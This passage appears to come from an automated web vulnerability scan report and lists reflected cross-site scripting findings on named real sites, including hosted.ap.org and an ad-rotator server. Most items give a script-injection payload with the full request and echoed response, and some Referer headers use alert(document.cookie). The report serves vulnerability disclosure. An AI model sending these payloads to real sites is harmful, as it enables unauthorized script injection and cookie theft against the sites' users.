...[SNIP]...

4.451. http://hosted.ap.org/dynamic/external/ibd.morningstar.com/AP/IndexReturns.html [CN parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://hosted.ap.org
Path:   /dynamic/external/ibd.morningstar.com/AP/IndexReturns.html

Issue detail

The value of the CN request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c866d"><script>alert(1)</script>e14b1d4bb59 was submitted in the CN parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /dynamic/external/ibd.morningstar.com/AP/IndexReturns.html?CN=AP707c866d"><script>alert(1)</script>e14b1d4bb59&idx=2&SITE=MABOH&SECTION=DJSP_COMPLETE&TEMPLATE= HTTP/1.1
Host: hosted.ap.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: SITE=MABOH; SECTION=DJSP_COMPLETE;

Response

HTTP/1.1 200 OK
Server: Apache/2.2.3 (Linux/SUSE)
Set-Cookie: SITE=MABOH; Path=/
Set-Cookie: SECTION=DJSP_COMPLETE; Path=/
Content-Type: text/html
Expires: Sat, 29 Jan 2011 04:49:52 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sat, 29 Jan 2011 04:49:52 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 71409

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" >
<head>
<title>Business - BostonHerald
...[SNIP]...
<form name="FormAPTop" method=get action="http://hosted.ap.org/dynamic/external/ibd.morningstar.com/quicktake/standard/client/shell/AP707c866d"><script>alert(1)</script>e14b1d4bb59.html" style="margin:0px;">
...[SNIP]...

4.452. http://hosted.ap.org/dynamic/external/ibd.morningstar.com/AP/IndexReturns.html [idx parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://hosted.ap.org
Path:   /dynamic/external/ibd.morningstar.com/AP/IndexReturns.html

Issue detail

The value of the idx request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9585c"%3balert(1)//dd20765be50 was submitted in the idx parameter. This input was echoed as 9585c";alert(1)//dd20765be50 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /dynamic/external/ibd.morningstar.com/AP/IndexReturns.html?CN=AP707&idx=29585c"%3balert(1)//dd20765be50&SITE=MABOH&SECTION=DJSP_COMPLETE&TEMPLATE= HTTP/1.1
Host: hosted.ap.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: SITE=MABOH; SECTION=DJSP_COMPLETE;

Response

HTTP/1.1 200 OK
Server: Apache/2.2.3 (Linux/SUSE)
Set-Cookie: SITE=MABOH; Path=/
Set-Cookie: SECTION=DJSP_COMPLETE; Path=/
Content-Type: text/html
Expires: Sat, 29 Jan 2011 04:50:08 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sat, 29 Jan 2011 04:50:08 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 71293

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" >
<head>
<title>Business - BostonHerald
...[SNIP]...
<script type="text/javascript">

var apLink="http://hosted.ap.org/dynamic/external/ibd.morningstar.com/AP/indexreturns.html?CN=AP707&amp;Idx=29585c";alert(1)//dd20765be50&amp;SITE=MABOH&amp;SECTION=DJSP_COMPLETE";

function SetPage(lastNum, action)
{

   document.frmSort.action = apLink;
   document.frmSort.method = "Post";

   var firstRecN = 0;

   var NUMRECORD
...[SNIP]...

4.453. http://hosted.ap.org/dynamic/external/ibd.morningstar.com/AP/IndexReturns.html [idx parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://hosted.ap.org
Path:   /dynamic/external/ibd.morningstar.com/AP/IndexReturns.html

Issue detail

The value of the idx request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c63db"><script>alert(1)</script>5f8144f9788 was submitted in the idx parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /dynamic/external/ibd.morningstar.com/AP/IndexReturns.html?CN=AP707&idx=2c63db"><script>alert(1)</script>5f8144f9788&SITE=MABOH&SECTION=DJSP_COMPLETE&TEMPLATE= HTTP/1.1
Host: hosted.ap.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: SITE=MABOH; SECTION=DJSP_COMPLETE;

Response

HTTP/1.1 200 OK
Server: Apache/2.2.3 (Linux/SUSE)
Set-Cookie: SITE=MABOH; Path=/
Set-Cookie: SECTION=DJSP_COMPLETE; Path=/
Content-Type: text/html
Expires: Sat, 29 Jan 2011 04:50:02 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sat, 29 Jan 2011 04:50:02 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 71323

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" >
<head>
<title>Business - BostonHerald
...[SNIP]...
<form name="frmSort" Action="http://hosted.ap.org/dynamic/external/ibd.morningstar.com/AP/indexreturns.html?CN=AP707&amp;Idx=2c63db"><script>alert(1)</script>5f8144f9788&amp;SITE=MABOH&amp;SECTION=DJSP_COMPLETE" method="post" ID="Form1">
...[SNIP]...

4.454. http://hosted.ap.org/dynamic/external/ibd.morningstar.com/AP/TickerLookup.html [CN parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://hosted.ap.org
Path:   /dynamic/external/ibd.morningstar.com/AP/TickerLookup.html

Issue detail

The value of the CN request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 17227"><script>alert(1)</script>9990806bf60 was submitted in the CN parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /dynamic/external/ibd.morningstar.com/AP/TickerLookup.html?CN=AP70717227"><script>alert(1)</script>9990806bf60&ticker= HTTP/1.1
Host: hosted.ap.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: SITE=MABOH; SECTION=DJSP_COMPLETE;

Response

HTTP/1.1 200 OK
Set-Cookie: SITE=MABOH; Path=/
Set-Cookie: SECTION=DJSP_COMPLETE; Path=/
Content-Type: text/html
Expires: Sat, 29 Jan 2011 04:49:54 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sat, 29 Jan 2011 04:49:54 GMT
Content-Length: 32723
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" >
<head>
<title>Business - BostonHerald
...[SNIP]...
<form name="FormAPTop" method=get action="http://hosted.ap.org/dynamic/external/ibd.morningstar.com/quicktake/standard/client/shell/AP70717227"><SCRIPT>ALERT(1)</SCRIPT>9990806BF60.html" style="margin:0px;">
...[SNIP]...

4.455. http://hosted.ap.org/dynamic/external/ibd.morningstar.com/AP/TickerLookup.html [ticker parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://hosted.ap.org
Path:   /dynamic/external/ibd.morningstar.com/AP/TickerLookup.html

Issue detail

The value of the ticker request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e6c61"><script>alert(1)</script>7231934c67 was submitted in the ticker parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /dynamic/external/ibd.morningstar.com/AP/TickerLookup.html?CN=AP707&ticker=e6c61"><script>alert(1)</script>7231934c67 HTTP/1.1
Host: hosted.ap.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: SITE=MABOH; SECTION=DJSP_COMPLETE;

Response

HTTP/1.1 200 OK
Server: Apache/2.2.3 (Linux/SUSE)
Set-Cookie: SITE=MABOH; Path=/
Set-Cookie: SECTION=DJSP_COMPLETE; Path=/
Content-Type: text/html
Expires: Sat, 29 Jan 2011 04:50:05 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sat, 29 Jan 2011 04:50:05 GMT
Content-Length: 32582
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" >
<head>
<title>Business - BostonHerald
...[SNIP]...
<input type=text name="ticker" maxlength=100 value="e6c61"><script>alert(1)</script>7231934c67" class=InputTicker>
...[SNIP]...

4.456. http://hosted.ap.org/dynamic/external/ibd.morningstar.com/quicktake/standard/client/shell/AP707.html [CN parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://hosted.ap.org
Path:   /dynamic/external/ibd.morningstar.com/quicktake/standard/client/shell/AP707.html

Issue detail

The value of the CN request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 9ca15'%3balert(1)//242f072a60e was submitted in the CN parameter. This input was echoed as 9ca15';alert(1)//242f072a60e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /dynamic/external/ibd.morningstar.com/quicktake/standard/client/shell/AP707.html?CN=AP7079ca15'%3balert(1)//242f072a60e&valid=NO&set=new&view=quote&ticker= HTTP/1.1
Host: hosted.ap.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: SITE=MABOH; SECTION=DJSP_COMPLETE;

Response

HTTP/1.1 200 OK
Server: Apache/2.2.3 (Linux/SUSE)
Set-Cookie: SITE=MABOH; Path=/
Set-Cookie: SECTION=DJSP_COMPLETE; Path=/
Content-Type: text/html;charset=utf-8
Expires: Sat, 29 Jan 2011 04:50:13 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sat, 29 Jan 2011 04:50:13 GMT
Content-Length: 25958
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" >
<head>
<title>Business - BostonHerald
...[SNIP]...
pt language="javascript" type="text/javascript">
_BaseMStarHost = 'http://ibd.morningstar.com/quicktake/standard/client/shell/';
MSQString = 'valid=NO&MP=FP';

searchPage = new SearchPage('','AP7079CA15';ALERT(1)//242F072A60E','SearchResult', 'SearchResultContain', 30, 10, 0, 450, MSQString);
</script>
...[SNIP]...

4.457. http://hpi.rotator.hadj7.adjuggler.net/favicon.ico [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://hpi.rotator.hadj7.adjuggler.net
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 68108<script>alert(1)</script>2a6b507c2b0 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /favicon.ico68108<script>alert(1)</script>2a6b507c2b0 HTTP/1.1
Host: hpi.rotator.hadj7.adjuggler.net
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ajess1_ADC1D6F3ECF9BDEC48AA769B=a; ajcmp=20236X00631Sh00PZ

Response

HTTP/1.1 200 OK
Server: JBird/1.0b
Connection: close
Date: Fri, 28 Jan 2011 17:24:03 GMT
Content-Type: text/html

<H1>404 Not Found</H1>
<pre>Resource /favicon.ico68108<script>alert(1)</script>2a6b507c2b0 not found</pre>
<BR>

4.458. http://hpi.rotator.hadj7.adjuggler.net/servlet/ajrotator/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://hpi.rotator.hadj7.adjuggler.net
Path:   /servlet/ajrotator/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload eb1f0<script>alert(1)</script>7dc5a16144 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /servleteb1f0<script>alert(1)</script>7dc5a16144/ajrotator/ HTTP/1.1
Host: hpi.rotator.hadj7.adjuggler.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ajcmp=20236X631Sh003KAA; optin=Aa; i=201013Ptn3Ji53Por0000-N81mUzJ_0VX17740822913_677625_2FX101379805453000031de; ajess1_ADC1D6F3ECF9BDEC48AA769B=a;

Response

HTTP/1.1 200 OK
Server: JBird/1.0b
Connection: close
Date: Fri, 28 Jan 2011 16:46:05 GMT
Content-Type: text/html

<H1>404 Not Found</H1>
<pre>Resource /servleteb1f0<script>alert(1)</script>7dc5a16144/ajrotator/ not found</pre>
<BR>

4.459. http://hpi.rotator.hadj7.adjuggler.net/servlet/ajrotator/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://hpi.rotator.hadj7.adjuggler.net
Path:   /servlet/ajrotator/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 70655<script>alert(1)</script>47968bcc251 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /servlet/ajrotator70655<script>alert(1)</script>47968bcc251/ HTTP/1.1
Host: hpi.rotator.hadj7.adjuggler.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ajcmp=20236X631Sh003KAA; optin=Aa; i=201013Ptn3Ji53Por0000-N81mUzJ_0VX17740822913_677625_2FX101379805453000031de; ajess1_ADC1D6F3ECF9BDEC48AA769B=a;

Response

HTTP/1.1 200 OK
Server: JBird/1.0b
Connection: close
Date: Fri, 28 Jan 2011 16:46:07 GMT
Content-Type: text/html

<H1>404 Not Found</H1>
<pre>Resource /servlet/ajrotator70655<script>alert(1)</script>47968bcc251/ not found</pre>
<BR>

4.460. http://hpi.rotator.hadj7.adjuggler.net/servlet/ajrotator/63722/0/cj/V127BB6CB93J-573I704K63342ADC1D6F3ADC1D6F3K63704K63703QK63352QQP0G00G0Q05BC434B000016/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://hpi.rotator.hadj7.adjuggler.net
Path:   /servlet/ajrotator/63722/0/cj/V127BB6CB93J-573I704K63342ADC1D6F3ADC1D6F3K63704K63703QK63352QQP0G00G0Q05BC434B000016/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 27cbd<script>alert(1)</script>6907b2da62a was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /servlet27cbd<script>alert(1)</script>6907b2da62a/ajrotator/63722/0/cj/V127BB6CB93J-573I704K63342ADC1D6F3ADC1D6F3K63704K63703QK63352QQP0G00G0Q05BC434B000016/ HTTP/1.1
Host: hpi.rotator.hadj7.adjuggler.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ajcmp=20236X631Sh003KAA; optin=Aa; i=201013Ptn3Ji53Por0000-N81mUzJ_0VX17740822913_677625_2FX101379805453000031de; ajess1_ADC1D6F3ECF9BDEC48AA769B=a;

Response

HTTP/1.1 200 OK
Server: JBird/1.0b
Connection: close
Date: Fri, 28 Jan 2011 16:46:05 GMT
Content-Type: text/html

<H1>404 Not Found</H1>
<pre>Resource /servlet27cbd<script>alert(1)</script>6907b2da62a/ajrotator/63722/0/cj/V127BB6CB93J-573I704K63342ADC1D6F3ADC1D6F3K63704K63703QK63352QQP0G00G0Q05BC434B000016/ not found</pre>
...[SNIP]...

4.461. http://hpi.rotator.hadj7.adjuggler.net/servlet/ajrotator/63722/0/cj/V127BB6CB93J-573I704K63342ADC1D6F3ADC1D6F3K63704K63703QK63352QQP0G00G0Q05BC434B000016/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://hpi.rotator.hadj7.adjuggler.net
Path:   /servlet/ajrotator/63722/0/cj/V127BB6CB93J-573I704K63342ADC1D6F3ADC1D6F3K63704K63703QK63352QQP0G00G0Q05BC434B000016/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload ba19b<script>alert(1)</script>14c865a5c05 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /servlet/ajrotatorba19b<script>alert(1)</script>14c865a5c05/63722/0/cj/V127BB6CB93J-573I704K63342ADC1D6F3ADC1D6F3K63704K63703QK63352QQP0G00G0Q05BC434B000016/ HTTP/1.1
Host: hpi.rotator.hadj7.adjuggler.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ajcmp=20236X631Sh003KAA; optin=Aa; i=201013Ptn3Ji53Por0000-N81mUzJ_0VX17740822913_677625_2FX101379805453000031de; ajess1_ADC1D6F3ECF9BDEC48AA769B=a;

Response

HTTP/1.1 200 OK
Server: JBird/1.0b
Connection: close
Date: Fri, 28 Jan 2011 16:46:05 GMT
Content-Type: text/html

<H1>404 Not Found</H1>
<pre>Resource /servlet/ajrotatorba19b<script>alert(1)</script>14c865a5c05/63722/0/cj/V127BB6CB93J-573I704K63342ADC1D6F3ADC1D6F3K63704K63703QK63352QQP0G00G0Q05BC434B000016/ not found</pre>
...[SNIP]...

4.462. http://hpi.rotator.hadj7.adjuggler.net/servlet/ajrotator/63722/0/vj [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://hpi.rotator.hadj7.adjuggler.net
Path:   /servlet/ajrotator/63722/0/vj

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 392f3<script>alert(1)</script>219f978c563 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /servlet392f3<script>alert(1)</script>219f978c563/ajrotator/63722/0/vj?z=hpi&dim=63352&pos=1&pv=1866403664462269&nc=5322587 HTTP/1.1
Host: hpi.rotator.hadj7.adjuggler.net
Proxy-Connection: keep-alive
Referer: http://www.nydailynews.com/blogs70f75'%3balert(document.cookie)//84f766b9c15/jets/2011/01/live-chat-friday-noon-1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: JBird/1.0b
Connection: close
Date: Fri, 28 Jan 2011 16:41:58 GMT
Content-Type: text/html

<H1>404 Not Found</H1>
<pre>Resource /servlet392f3<script>alert(1)</script>219f978c563/ajrotator/63722/0/vj not found</pre>
<BR>

4.463. http://hpi.rotator.hadj7.adjuggler.net/servlet/ajrotator/63722/0/vj [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://hpi.rotator.hadj7.adjuggler.net
Path:   /servlet/ajrotator/63722/0/vj

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload a0304<script>alert(1)</script>eba54b6ea1 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /servlet/ajrotatora0304<script>alert(1)</script>eba54b6ea1/63722/0/vj?z=hpi&dim=63352&pos=1&pv=1866403664462269&nc=5322587 HTTP/1.1
Host: hpi.rotator.hadj7.adjuggler.net
Proxy-Connection: keep-alive
Referer: http://www.nydailynews.com/blogs70f75'%3balert(document.cookie)//84f766b9c15/jets/2011/01/live-chat-friday-noon-1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: JBird/1.0b
Connection: close
Date: Fri, 28 Jan 2011 16:41:57 GMT
Content-Type: text/html

<H1>404 Not Found</H1>
<pre>Resource /servlet/ajrotatora0304<script>alert(1)</script>eba54b6ea1/63722/0/vj not found</pre>
<BR>

4.464. http://hpi.rotator.hadj7.adjuggler.net/servlet/ajrotator/63723/0/cj/V12D7843BC0J-573I704K63342ADC1D6F3ADC1D6F3K82427K82131QK63359QQP0G00G0Q05BC4B4000001E/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://hpi.rotator.hadj7.adjuggler.net
Path:   /servlet/ajrotator/63723/0/cj/V12D7843BC0J-573I704K63342ADC1D6F3ADC1D6F3K82427K82131QK63359QQP0G00G0Q05BC4B4000001E/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 16fb7<script>alert(1)</script>adc248a20be was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /servlet16fb7<script>alert(1)</script>adc248a20be/ajrotator/63723/0/cj/V12D7843BC0J-573I704K63342ADC1D6F3ADC1D6F3K82427K82131QK63359QQP0G00G0Q05BC4B4000001E/ HTTP/1.1
Host: hpi.rotator.hadj7.adjuggler.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ajcmp=20236X631Sh003KAA; optin=Aa; i=201013Ptn3Ji53Por0000-N81mUzJ_0VX17740822913_677625_2FX101379805453000031de; ajess1_ADC1D6F3ECF9BDEC48AA769B=a;

Response

HTTP/1.1 200 OK
Server: JBird/1.0b
Connection: close
Date: Fri, 28 Jan 2011 16:46:10 GMT
Content-Type: text/html

<H1>404 Not Found</H1>
<pre>Resource /servlet16fb7<script>alert(1)</script>adc248a20be/ajrotator/63723/0/cj/V12D7843BC0J-573I704K63342ADC1D6F3ADC1D6F3K82427K82131QK63359QQP0G00G0Q05BC4B4000001E/ not found</pre>
...[SNIP]...

4.465. http://hpi.rotator.hadj7.adjuggler.net/servlet/ajrotator/63723/0/cj/V12D7843BC0J-573I704K63342ADC1D6F3ADC1D6F3K82427K82131QK63359QQP0G00G0Q05BC4B4000001E/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://hpi.rotator.hadj7.adjuggler.net
Path:   /servlet/ajrotator/63723/0/cj/V12D7843BC0J-573I704K63342ADC1D6F3ADC1D6F3K82427K82131QK63359QQP0G00G0Q05BC4B4000001E/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 4b5ec<script>alert(1)</script>60ca2fa0c6 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /servlet/ajrotator4b5ec<script>alert(1)</script>60ca2fa0c6/63723/0/cj/V12D7843BC0J-573I704K63342ADC1D6F3ADC1D6F3K82427K82131QK63359QQP0G00G0Q05BC4B4000001E/ HTTP/1.1
Host: hpi.rotator.hadj7.adjuggler.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ajcmp=20236X631Sh003KAA; optin=Aa; i=201013Ptn3Ji53Por0000-N81mUzJ_0VX17740822913_677625_2FX101379805453000031de; ajess1_ADC1D6F3ECF9BDEC48AA769B=a;

Response

HTTP/1.1 200 OK
Server: JBird/1.0b
Connection: close
Date: Fri, 28 Jan 2011 16:46:10 GMT
Content-Type: text/html

<H1>404 Not Found</H1>
<pre>Resource /servlet/ajrotator4b5ec<script>alert(1)</script>60ca2fa0c6/63723/0/cj/V12D7843BC0J-573I704K63342ADC1D6F3ADC1D6F3K82427K82131QK63359QQP0G00G0Q05BC4B4000001E/ not found</pre>
...[SNIP]...

4.466. http://hpi.rotator.hadj7.adjuggler.net/servlet/ajrotator/63723/0/vj [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://hpi.rotator.hadj7.adjuggler.net
Path:   /servlet/ajrotator/63723/0/vj

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 61456<script>alert(1)</script>bd4d5cb3b8a was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /servlet61456<script>alert(1)</script>bd4d5cb3b8a/ajrotator/63723/0/vj?z=hpi&dim=63359&pos=1&pv=972835293505342&nc=23918955 HTTP/1.1
Host: hpi.rotator.hadj7.adjuggler.net
Proxy-Connection: keep-alive
Referer: http://www.nydailynews.com/blogs70f75'%3balert(1)//84f766b9c15/jets/2011/01/live-chat-friday-noon-1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: optin=Aa; ajess1_ADC1D6F3ECF9BDEC48AA769B=a; ajcmp=20236X6003Csd

Response

HTTP/1.1 200 OK
Server: JBird/1.0b
Connection: close
Date: Fri, 28 Jan 2011 16:42:09 GMT
Content-Type: text/html

<H1>404 Not Found</H1>
<pre>Resource /servlet61456<script>alert(1)</script>bd4d5cb3b8a/ajrotator/63723/0/vj not found</pre>
<BR>

4.467. http://hpi.rotator.hadj7.adjuggler.net/servlet/ajrotator/63723/0/vj [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://hpi.rotator.hadj7.adjuggler.net
Path:   /servlet/ajrotator/63723/0/vj

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload ab38f<script>alert(1)</script>fdc76c91cde was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /servlet/ajrotatorab38f<script>alert(1)</script>fdc76c91cde/63723/0/vj?z=hpi&dim=63359&pos=1&pv=972835293505342&nc=23918955 HTTP/1.1
Host: hpi.rotator.hadj7.adjuggler.net
Proxy-Connection: keep-alive
Referer: http://www.nydailynews.com/blogs70f75'%3balert(1)//84f766b9c15/jets/2011/01/live-chat-friday-noon-1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: optin=Aa; ajess1_ADC1D6F3ECF9BDEC48AA769B=a; ajcmp=20236X6003Csd

Response

HTTP/1.1 200 OK
Server: JBird/1.0b
Connection: close
Date: Fri, 28 Jan 2011 16:42:09 GMT
Content-Type: text/html

<H1>404 Not Found</H1>
<pre>Resource /servlet/ajrotatorab38f<script>alert(1)</script>fdc76c91cde/63723/0/vj not found</pre>
<BR>

4.468. http://hpi.rotator.hadj7.adjuggler.net/servlet/ajrotator/63733/0/cj/V1259C3470CJ-573I704K63342ADC1D6F3ADC1D6F3K63720K63690QK63352QQP0G00G0Q05BC65C8000056/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://hpi.rotator.hadj7.adjuggler.net
Path:   /servlet/ajrotator/63733/0/cj/V1259C3470CJ-573I704K63342ADC1D6F3ADC1D6F3K63720K63690QK63352QQP0G00G0Q05BC65C8000056/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 1bfba<script>alert(1)</script>20f5747086d was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

